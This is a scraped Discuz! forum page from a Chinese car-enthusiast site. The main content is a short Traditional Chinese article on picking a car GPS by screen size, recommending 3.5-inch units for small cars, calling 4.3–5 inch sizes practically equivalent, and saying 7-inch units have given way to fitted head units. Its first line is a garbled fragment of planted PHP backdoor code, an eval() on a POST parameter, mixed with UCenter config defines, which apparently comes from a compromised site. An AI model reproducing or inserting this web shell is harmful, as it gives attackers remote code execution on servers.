');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); GPS屏幕尺寸同樣重要 - GPS - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

GPS屏幕尺寸同樣重要

在選擇屏幕大小的時候,我們一般把GPS分為三大種類:3.5英吋的小屏幕產品、4.3-5英吋的主流產品、7英吋大屏幕產品。筆者建議還是根據自己駕駛的車型來進行選擇,那麼我們如何來區別呢?



3.5英吋的產品在擺放上比較靈活

    如果車身較小或擋風玻璃面積較小的車型,我們比較推薦3.5英吋的產品。不僅是因為3.5英吋產品的面積較小,另一方面是由於選購小型家用車的用戶,大部分是女性朋友,她們在使用車載GPS導航儀的時候更適合將導航儀放在左側後視鏡旁,這樣就不用伸手去操作台中間的位置來操作機器這麼麻煩了。


4.3-5英吋的產品在使用上區別不大

    4.3-5英吋的產品在實際行駛的情況下,可視範圍基本上是相同的,要是不刻意的去對比它們之間的大小,基本上在使用時沒有什麼區別,所以在選購的時候完全刻意不用太在意這麼小的一點區別。

    至於7英吋的GPS,因為機身較大,所以現在市場上基本上淘汰了這一類產品,取而代之的是改裝型車機,改裝型車機因為不存在遮擋到司機朋友的視線問題,所以如果想要選購大屏幕的消費者,可以考慮一下改裝型車機之類的產品。
返回列表